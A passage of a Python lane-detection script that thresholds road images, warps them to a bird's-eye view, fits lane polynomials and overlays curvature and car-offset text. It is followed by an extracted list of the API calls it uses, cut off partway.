# polynomial coefficients averaged over the last n iterations
self.best_fit = None
# polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
# difference in fit coefficients between last and new fits
self.diffs = np.array([0, 0, 0], dtype='float')
# x values for detected line pixels
self.allx = None
# y values for detected line pixels
self.ally = None
# counter to reset after 5 iterations if issues arise
self.counter = 0
def pipeline(img, s_thresh=(125, 255), sx_thresh=(10, 100), R_thresh=(200, 255), sobel_kernel=3):
""" Pipeline to create binary image.
This version uses thresholds on the R & S color channels and Sobelx.
Binary activation occurs where any two of the three are activated.
"""
distorted_img = np.copy(img)
dst = cv2.undistort(distorted_img, mtx, dist, None, mtx)
# Pull R
R = dst[:, :, 0]
# Convert to HLS colorspace
hls = cv2.cvtColor(dst, cv2.COLOR_RGB2HLS).astype(np.float)
h_channel = hls[:, :, 0]
l_channel = hls[:, :, 1]
s_channel = hls[:, :, 2]
# Sobelx - takes the derivate in x, absolute value, then rescale
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
abs_sobelx = np.absolute(sobelx)
scaled_sobelx = np.uint8(255 * abs_sobelx / np.max(abs_sobelx))
# Threshold x gradient
sxbinary = np.zeros_like(scaled_sobelx)
sxbinary[(scaled_sobelx >= sx_thresh[0]) & (scaled_sobelx <= sx_thresh[1])] = 1
# Threshold R color channel
R_binary = np.zeros_like(R)
R_binary[(R >= R_thresh[0]) & (R <= R_thresh[1])] = 1
# Threshold color channel
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# If two of the three are activated, activate in the binary image
combined_binary = np.zeros_like(sxbinary)
combined_binary[((s_binary == 1) & (sxbinary == 1)) | ((sxbinary == 1) & (R_binary == 1))
| ((s_binary == 1) & (R_binary == 1))] = 1
return combined_binary
def birds_eye(img, mtx, dist):
""" Birds eye first undistorts the image, using the calibration from earlier.
Next, using defined source image points and destination points,
it will transform the image as if the road was viewed from above,
like a bird would see. Returns the birds eye image and transform matrix.
"""
# Put the image through the pipeline to get the binary image
binary_img = pipeline(img)
# Undistort
undist = cv2.undistort(binary_img, mtx, dist, None, mtx)
# Grab the image shape
img_size = (undist.shape[1], undist.shape[0])
# Source points - defined area of lane line edges
src = np.float32([[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]])
# 4 destination points to transfer
offset = 300 # offset for dst points
dst = np.float32([[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]],
[offset, img_size[1]], [offset, 0]])
# Use cv2.getPerspectiveTransform() to get M, the transform matrix
M = cv2.getPerspectiveTransform(src, dst)
# Use cv2.warpPerspective() to warp the image to a top-down view
top_down = cv2.warpPerspective(undist, M, img_size)
return top_down, M
def count_check(line):
""" Resets to using new sliding windows below if
upon failing five times in a row.
"""
if line.counter >= 5:
line.detected = False
def first_lines(img, mtx, dist):
""" First Lines uses the birds eye image from above,
creates a histogram of where the binary activations occur,
and uses sliding windows along the peak areas to estimate
where the lane lines are.
"""
# Load the birds eye image and transform matrix from birds_eye
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0] / 2:, :], axis=0)
# Output image an to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0] / 2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Choose the number of sliding windows
nwindows = 9
# Set height of windows
window_height = np.int(binary_warped.shape[0] / nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated for each window
leftx_current = leftx_base
rightx_current = rightx_base
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window + 1) * window_height
win_y_high = binary_warped.shape[0] - window * window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
# Identify the nonzero pixels in x and y within the window
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (
nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (
nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
# The challenge videos sometimes throw errors, so the below try first
# Upon the error being thrown, set line.detected to False
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
left_line.detected = False
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
left_line.detected = False
# Next, right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
right_line.detected = False
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
right_line.detected = False
def second_ord_poly(line, val):
""" Simple function being used to help calculate distance from center.
Only used within Draw Lines below. Finds the base of the line at the
bottom of the image.
"""
a = line[0]
b = line[1]
c = line[2]
formula = (a * val ** 2) + (b * val) + c
return formula
def draw_lines(img, mtx, dist):
""" Draw Lines will first check whether the lines are detected.
If not, go back up to First Lines. If they are, we do not have to search
the whole image for the lines. We can then draw the lines,
as well as detect where the car is in relation to the middle of the lane,
and what type of curvature it is driving at.
"""
# Pull in the image
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Check if lines were last detected; if not, re-run first_lines
if left_line.detected == False | right_line.detected == False:
first_lines(img, mtx, dist)
# Set the fit as the current fit for now
left_fit = left_line.current_fit
right_fit = right_line.current_fit
# Again, find the lane indicators
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
margin = 100
left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (
nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))
right_lane_inds = (
(nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (
nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))
# Set the x and y values of points on each line
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each again.
# Similar to first_lines, need to try in case of errors
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
count_check(left_line)
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
count_check(left_line)
# Now right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
count_check(right_line)
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
count_check(right_line)
# Generate x and y values for plotting
fity = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
fit_leftx = left_fit[0] * fity ** 2 + left_fit[1] * fity + left_fit[2]
fit_rightx = right_fit[0] * fity ** 2 + right_fit[1] * fity + right_fit[2]
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([fit_leftx - margin, fity]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_leftx + margin, fity])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([fit_rightx - margin, fity]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_rightx + margin, fity])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Calculate the pixel curve radius
y_eval = np.max(fity)
left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])
right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30 / 720 # meters per pixel in y dimension
xm_per_pix = 3.7 / 700 # meters per pixel in x dimension
# Fit new polynomials to x,y in world space
left_fit_cr = np.polyfit(left_line.all_y * ym_per_pix, left_line.all_x * xm_per_pix, 2)
right_fit_cr = np.polyfit(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)
# Calculate the new radii of curvature
left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * left_fit_cr[0])
right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * right_fit_cr[0])
avg_rad = round(np.mean([left_curverad, right_curverad]), 0)
rad_text = "Radius of Curvature = {}(m)".format(avg_rad)
# Calculating middle of the image, aka where the car camera is
middle_of_image = img.shape[1] / 2
car_position = middle_of_image * xm_per_pix
# Calculating middle of the lane
left_line_base = second_ord_poly(left_fit_cr, img.shape[0] * ym_per_pix)
right_line_base = second_ord_poly(right_fit_cr, img.shape[0] * ym_per_pix)
lane_mid = (left_line_base + right_line_base) / 2
# Calculate distance from center and list differently based on left or right
dist_from_center = lane_mid - car_position
if dist_from_center >= 0:
center_text = "{} meters left of center".format(round(dist_from_center, 2))
else:
center_text = "{} meters right of center".format(round(-dist_from_center, 2))
# List car's position in relation to middle on the image and radius of curvature
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)
cv2.putText(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)
# Invert the transform matrix from birds_eye (to later make the image back to normal below)
Minv = np.linalg.inv(perspective_M)
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([fit_leftx, fity]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([fit_rightx, fity])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
return result
def process_image(image):
""" This processes through everything above.
Will return the image with car position, lane curvature, and lane lines drawn.
"""
result = draw_lines(image, mtx, dist)
return result
# Set the class lines equal to the variables used above
left_line = Left_Line()
right_line = Right_Line()
# Convert to video
# vid_output is where the image will be saved to
vid_output = 'project_video_detected.mp4'
# The file referenced in clip1 is the original video before anything has been done to it
# clip1 = VideoFileClip("project_video.mp4")
# NOTE: this function expects color images
# vid_clip = clip1.fl_image(process_image)
# vid_clip.write_videofile(vid_output, audio=False)
test_img_dir = 'test_images'
for test_img in os.listdir(test_img_dir):
frame = cv2.imread(os.path.join(test_img_dir, test_img))
blend = process_image(frame)
cv2.imwrite('output_images/{}'.format(test_img), blend)
plt.imshow(cv2.cvtColor(blend, code=cv2.COLOR_BGR2RGB))
plt.show()
| [
"cv2.rectangle",
"numpy.hstack",
"numpy.polyfit",
"matplotlib.image.imread",
"cv2.imshow",
"numpy.array",
"cv2.warpPerspective",
"cv2.destroyAllWindows",
"cv2.calibrateCamera",
"cv2.findChessboardCorners",
"numpy.mean",
"os.listdir",
"cv2.undistort",
"numpy.max",
"cv2.addWeighted",
"nu... | [((442, 482), 'glob.glob', 'glob.glob', (['"""camera_cal/calibration*.jpg"""'], {}), "('camera_cal/calibration*.jpg')\n", (451, 482), False, 'import glob\n'), ((560, 592), 'numpy.zeros', 'np.zeros', (['(6 * 9, 3)', 'np.float32'], {}), '((6 * 9, 3), np.float32)\n', (568, 592), True, 'import numpy as np\n'), ((1607, 1680), 'cv2.calibrateCamera', 'cv2.calibrateCamera', (['obj_points', 'img_points', 'gray.shape[::-1]', 'None', 'None'], {}), '(obj_points, img_points, gray.shape[::-1], None, None)\n', (1626, 1680), False, 'import cv2\n'), ((20630, 20654), 'os.listdir', 'os.listdir', (['test_img_dir'], {}), '(test_img_dir)\n', (20640, 20654), False, 'import os\n'), ((892, 908), 'matplotlib.image.imread', 'mpimg.imread', (['im'], {}), '(im)\n', (904, 908), True, 'import matplotlib.image as mpimg\n'), ((1048, 1087), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (1060, 1087), False, 'import cv2\n'), ((1152, 1197), 'cv2.findChessboardCorners', 'cv2.findChessboardCorners', (['gray', '(9, 6)', 'None'], {}), '(gray, (9, 6), None)\n', (1177, 1197), False, 'import cv2\n'), ((1522, 1545), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1543, 1545), False, 'import cv2\n'), ((3568, 3580), 'numpy.copy', 'np.copy', (['img'], {}), '(img)\n', (3575, 3580), True, 'import numpy as np\n'), ((3591, 3641), 'cv2.undistort', 'cv2.undistort', (['distorted_img', 'mtx', 'dist', 'None', 'mtx'], {}), '(distorted_img, mtx, dist, None, mtx)\n', (3604, 3641), False, 'import cv2\n'), ((3943, 4001), 'cv2.Sobel', 'cv2.Sobel', (['l_channel', 'cv2.CV_64F', '(1)', '(0)'], {'ksize': 'sobel_kernel'}), '(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n', (3952, 4001), False, 'import cv2\n'), ((4019, 4038), 'numpy.absolute', 'np.absolute', (['sobelx'], {}), '(sobelx)\n', (4030, 4038), True, 'import numpy as np\n'), ((4150, 4178), 'numpy.zeros_like', 'np.zeros_like', (['scaled_sobelx'], {}), '(scaled_sobelx)\n', (4163, 4178), True, 'import numpy as np\n'), ((4311, 4327), 'numpy.zeros_like', 'np.zeros_like', (['R'], {}), '(R)\n', (4324, 4327), True, 'import numpy as np\n'), ((4432, 4456), 'numpy.zeros_like', 'np.zeros_like', (['s_channel'], {}), '(s_channel)\n', (4445, 4456), True, 'import numpy as np\n'), ((4624, 4647), 'numpy.zeros_like', 'np.zeros_like', (['sxbinary'], {}), '(sxbinary)\n', (4637, 4647), True, 'import numpy as np\n'), ((5297, 5344), 'cv2.undistort', 'cv2.undistort', (['binary_img', 'mtx', 'dist', 'None', 'mtx'], {}), '(binary_img, mtx, dist, None, mtx)\n', (5310, 5344), False, 'import cv2\n'), ((5488, 5565), 'numpy.float32', 'np.float32', (['[[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]]'], {}), '([[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]])\n', (5498, 5565), True, 'import numpy as np\n'), ((5658, 5774), 'numpy.float32', 'np.float32', (['[[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]], [offset,\n img_size[1]], [offset, 0]]'], {}), '([[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]],\n [offset, img_size[1]], [offset, 0]])\n', (5668, 5774), True, 'import numpy as np\n'), ((5873, 5910), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['src', 'dst'], {}), '(src, dst)\n', (5900, 5910), False, 'import cv2\n'), ((5996, 6036), 'cv2.warpPerspective', 'cv2.warpPerspective', (['undist', 'M', 'img_size'], {}), '(undist, M, img_size)\n', (6015, 6036), False, 'import cv2\n'), ((6688, 6749), 'numpy.sum', 'np.sum', (['binary_warped[binary_warped.shape[0] / 2:, :]'], {'axis': '(0)'}), '(binary_warped[binary_warped.shape[0] / 2:, :], axis=0)\n', (6694, 6749), True, 'import numpy as np\n'), ((7036, 7066), 'numpy.int', 'np.int', (['(histogram.shape[0] / 2)'], {}), '(histogram.shape[0] / 2)\n', (7042, 7066), True, 'import numpy as np\n'), ((7084, 7115), 'numpy.argmax', 'np.argmax', (['histogram[:midpoint]'], {}), '(histogram[:midpoint])\n', (7093, 7115), True, 'import numpy as np\n'), ((7287, 7328), 'numpy.int', 'np.int', (['(binary_warped.shape[0] / nwindows)'], {}), '(binary_warped.shape[0] / nwindows)\n', (7293, 7328), True, 'import numpy as np\n'), ((7455, 7475), 'numpy.array', 'np.array', (['nonzero[0]'], {}), '(nonzero[0])\n', (7463, 7475), True, 'import numpy as np\n'), ((7491, 7511), 'numpy.array', 'np.array', (['nonzero[1]'], {}), '(nonzero[1])\n', (7499, 7511), True, 'import numpy as np\n'), ((9563, 9593), 'numpy.concatenate', 'np.concatenate', (['left_lane_inds'], {}), '(left_lane_inds)\n', (9577, 9593), True, 'import numpy as np\n'), ((9616, 9647), 'numpy.concatenate', 'np.concatenate', (['right_lane_inds'], {}), '(right_lane_inds)\n', (9630, 9647), True, 'import numpy as np\n'), ((12861, 12881), 'numpy.array', 'np.array', (['nonzero[0]'], {}), '(nonzero[0])\n', (12869, 12881), True, 'import numpy as np\n'), ((12897, 12917), 'numpy.array', 'np.array', (['nonzero[1]'], {}), '(nonzero[1])\n', (12905, 12917), True, 'import numpy as np\n'), ((15427, 15493), 'numpy.linspace', 'np.linspace', (['(0)', '(binary_warped.shape[0] - 1)', 'binary_warped.shape[0]'], {}), '(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n', (15438, 15493), True, 'import numpy as np\n'), ((15818, 15840), 'numpy.zeros_like', 'np.zeros_like', (['out_img'], {}), '(out_img)\n', (15831, 15840), True, 'import numpy as np\n'), ((16386, 16435), 'numpy.hstack', 'np.hstack', (['(left_line_window1, left_line_window2)'], {}), '((left_line_window1, left_line_window2))\n', (16395, 16435), True, 'import numpy as np\n'), ((16648, 16699), 'numpy.hstack', 'np.hstack', (['(right_line_window1, right_line_window2)'], {}), '((right_line_window1, right_line_window2))\n', (16657, 16699), True, 'import numpy as np\n'), ((16753, 16765), 'numpy.max', 'np.max', (['fity'], {}), '(fity)\n', (16759, 16765), True, 'import numpy as np\n'), ((17249, 17322), 'numpy.polyfit', 'np.polyfit', (['(left_line.all_y * ym_per_pix)', '(left_line.all_x * xm_per_pix)', '(2)'], {}), '(left_line.all_y * ym_per_pix, left_line.all_x * xm_per_pix, 2)\n', (17259, 17322), True, 'import numpy as np\n'), ((17342, 17417), 'numpy.polyfit', 'np.polyfit', (['(right_line.all_y * ym_per_pix)', '(right_line.all_x * xm_per_pix)', '(2)'], {}), '(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)\n', (17352, 17417), True, 'import numpy as np\n'), ((18746, 18814), 'cv2.putText', 'cv2.putText', (['img', 'center_text', '(10, 50)', 'font', '(1)', '(255, 255, 255)', '(2)'], {}), '(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)\n', (18757, 18814), False, 'import cv2\n'), ((18819, 18885), 'cv2.putText', 'cv2.putText', (['img', 'rad_text', '(10, 100)', 'font', '(1)', '(255, 255, 255)', '(2)'], {}), '(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)\n', (18830, 18885), False, 'import cv2\n'), ((18994, 19022), 'numpy.linalg.inv', 'np.linalg.inv', (['perspective_M'], {}), '(perspective_M)\n', (19007, 19022), True, 'import numpy as np\n'), ((19146, 19190), 'numpy.dstack', 'np.dstack', (['(warp_zero, warp_zero, warp_zero)'], {}), '((warp_zero, warp_zero, warp_zero))\n', (19155, 19190), True, 'import numpy as np\n'), ((19425, 19457), 'numpy.hstack', 'np.hstack', (['(pts_left, pts_right)'], {}), '((pts_left, pts_right))\n', (19434, 19457), True, 'import numpy as np\n'), ((19670, 19737), 'cv2.warpPerspective', 'cv2.warpPerspective', (['color_warp', 'Minv', '(img.shape[1], img.shape[0])'], {}), '(color_warp, Minv, (img.shape[1], img.shape[0]))\n', (19689, 19737), False, 'import cv2\n'), ((19801, 19841), 'cv2.addWeighted', 'cv2.addWeighted', (['img', '(1)', 'newwarp', '(0.3)', '(0)'], {}), '(img, 1, newwarp, 0.3, 0)\n', (19816, 19841), False, 'import cv2\n'), ((20876, 20886), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (20884, 20886), True, 'import matplotlib.pyplot as plt\n'), ((2207, 2241), 'numpy.array', 'np.array', (['[0, 0, 0]'], {'dtype': '"""float"""'}), "([0, 0, 0], dtype='float')\n", (2215, 2241), True, 'import numpy as np\n'), ((2995, 3029), 'numpy.array', 'np.array', (['[0, 0, 0]'], {'dtype': '"""float"""'}), "([0, 0, 0], dtype='float')\n", (3003, 3029), True, 'import numpy as np\n'), ((6823, 6879), 'numpy.dstack', 'np.dstack', (['(binary_warped, binary_warped, binary_warped)'], {}), '((binary_warped, binary_warped, binary_warped))\n', (6832, 6879), True, 'import numpy as np\n'), ((7134, 7165), 'numpy.argmax', 'np.argmax', (['histogram[midpoint:]'], {}), '(histogram[midpoint:])\n', (7143, 7165), True, 'import numpy as np\n'), ((8438, 8538), 'cv2.rectangle', 'cv2.rectangle', (['out_img', '(win_xleft_low, win_y_low)', '(win_xleft_high, win_y_high)', '(0, 255, 0)', '(2)'], {}), '(out_img, (win_xleft_low, win_y_low), (win_xleft_high,\n win_y_high), (0, 255, 0), 2)\n', (8451, 8538), False, 'import cv2\n'), ((8543, 8645), 'cv2.rectangle', 'cv2.rectangle', (['out_img', '(win_xright_low, win_y_low)', '(win_xright_high, win_y_high)', '(0, 255, 0)', '(2)'], {}), '(out_img, (win_xright_low, win_y_low), (win_xright_high,\n win_y_high), (0, 255, 0), 2)\n', (8556, 8645), False, 'import cv2\n'), ((10109, 10136), 'numpy.polyfit', 'np.polyfit', (['lefty', 'leftx', '(2)'], {}), '(lefty, leftx, 2)\n', (10119, 10136), True, 'import numpy as np\n'), ((10499, 10536), 'numpy.mean', 'np.mean', (['left_line.recent_fit'], {'axis': '(0)'}), '(left_line.recent_fit, axis=0)\n', (10506, 10536), True, 'import numpy as np\n'), ((10924, 10953), 'numpy.polyfit', 'np.polyfit', (['righty', 'rightx', '(2)'], {}), '(righty, rightx, 2)\n', (10934, 10953), True, 'import numpy as np\n'), ((11330, 11368), 'numpy.mean', 'np.mean', (['right_line.recent_fit'], {'axis': '(0)'}), '(right_line.recent_fit, axis=0)\n', (11337, 11368), True, 'import numpy as np\n'), ((13813, 13840), 'numpy.polyfit', 'np.polyfit', (['lefty', 'leftx', '(2)'], {}), '(lefty, leftx, 2)\n', (13823, 13840), True, 'import numpy as np\n'), ((14203, 14240), 'numpy.mean', 'np.mean', (['left_line.recent_fit'], {'axis': '(0)'}), '(left_line.recent_fit, axis=0)\n', (14210, 14240), True, 'import numpy as np\n'), ((14618, 14647), 'numpy.polyfit', 'np.polyfit', (['righty', 'rightx', '(2)'], {}), '(righty, rightx, 2)\n', (14628, 14647), True, 'import numpy as np\n'), ((15024, 15062), 'numpy.mean', 'np.mean', (['right_line.recent_fit'], {'axis': '(0)'}), '(right_line.recent_fit, axis=0)\n', (15031, 15062), True, 'import numpy as np\n'), ((15738, 15794), 'numpy.dstack', 'np.dstack', (['(binary_warped, binary_warped, binary_warped)'], {}), '((binary_warped, binary_warped, binary_warped))\n', (15747, 15794), True, 'import numpy as np\n'), ((16849, 16877), 'numpy.absolute', 'np.absolute', (['(2 * left_fit[0])'], {}), '(2 * left_fit[0])\n', (16860, 16877), True, 'import numpy as np\n'), ((16964, 16993), 'numpy.absolute', 'np.absolute', (['(2 * right_fit[0])'], {}), '(2 * right_fit[0])\n', (16975, 16993), True, 'import numpy as np\n'), ((17564, 17595), 'numpy.absolute', 'np.absolute', (['(2 * left_fit_cr[0])'], {}), '(2 * left_fit_cr[0])\n', (17575, 17595), True, 'import numpy as np\n'), ((17710, 17742), 'numpy.absolute', 'np.absolute', (['(2 * right_fit_cr[0])'], {}), '(2 * right_fit_cr[0])\n', (17721, 17742), True, 'import numpy as np\n'), ((17772, 17812), 'numpy.mean', 'np.mean', (['[left_curverad, right_curverad]'], {}), '([left_curverad, right_curverad])\n', (17779, 17812), True, 'import numpy as np\n'), ((19536, 19550), 'numpy.int_', 'np.int_', (['[pts]'], {}), '([pts])\n', (19543, 19550), True, 'import numpy as np\n'), ((20679, 20715), 'os.path.join', 'os.path.join', (['test_img_dir', 'test_img'], {}), '(test_img_dir, test_img)\n', (20691, 20715), False, 'import os\n'), ((20827, 20870), 'cv2.cvtColor', 'cv2.cvtColor', (['blend'], {'code': 'cv2.COLOR_BGR2RGB'}), '(blend, code=cv2.COLOR_BGR2RGB)\n', (20839, 20870), False, 'import cv2\n'), ((1376, 1440), 'cv2.drawChessboardCorners', 'cv2.drawChessboardCorners', (['image', '(9, 6)', 'corners', 'pattern_found'], {}), '(image, (9, 6), corners, pattern_found)\n', (1401, 1440), False, 'import cv2\n'), ((1453, 1475), 'cv2.imshow', 'cv2.imshow', (['"""img"""', 'img'], {}), "('img', img)\n", (1463, 1475), False, 'import cv2\n'), ((1488, 1504), 'cv2.waitKey', 'cv2.waitKey', (['(500)'], {}), '(500)\n', (1499, 1504), False, 'import cv2\n'), ((2100, 2117), 'numpy.array', 'np.array', (['[False]'], {}), '([False])\n', (2108, 2117), True, 'import numpy as np\n'), ((2888, 2905), 'numpy.array', 'np.array', (['[False]'], {}), '([False])\n', (2896, 2905), True, 'import numpy as np\n'), ((3719, 3755), 'cv2.cvtColor', 'cv2.cvtColor', (['dst', 'cv2.COLOR_RGB2HLS'], {}), '(dst, cv2.COLOR_RGB2HLS)\n', (3731, 3755), False, 'import cv2\n'), ((4087, 4105), 'numpy.max', 'np.max', (['abs_sobelx'], {}), '(abs_sobelx)\n', (4093, 4105), True, 'import numpy as np\n'), ((19083, 19111), 'numpy.zeros_like', 'np.zeros_like', (['binary_warped'], {}), '(binary_warped)\n', (19096, 19111), True, 'import numpy as np\n'), ((9352, 9385), 'numpy.mean', 'np.mean', (['nonzerox[good_left_inds]'], {}), '(nonzerox[good_left_inds])\n', (9359, 9385), True, 'import numpy as np\n'), ((9465, 9499), 'numpy.mean', 'np.mean', (['nonzerox[good_right_inds]'], {}), '(nonzerox[good_right_inds])\n', (9472, 9499), True, 'import numpy as np\n'), ((16226, 16263), 'numpy.vstack', 'np.vstack', (['[fit_leftx - margin, fity]'], {}), '([fit_leftx - margin, fity])\n', (16235, 16263), True, 'import numpy as np\n'), ((16484, 16522), 'numpy.vstack', 'np.vstack', (['[fit_rightx - margin, fity]'], {}), '([fit_rightx - margin, fity])\n', (16493, 16522), True, 'import numpy as np\n'), ((19300, 19328), 'numpy.vstack', 'np.vstack', (['[fit_leftx, fity]'], {}), 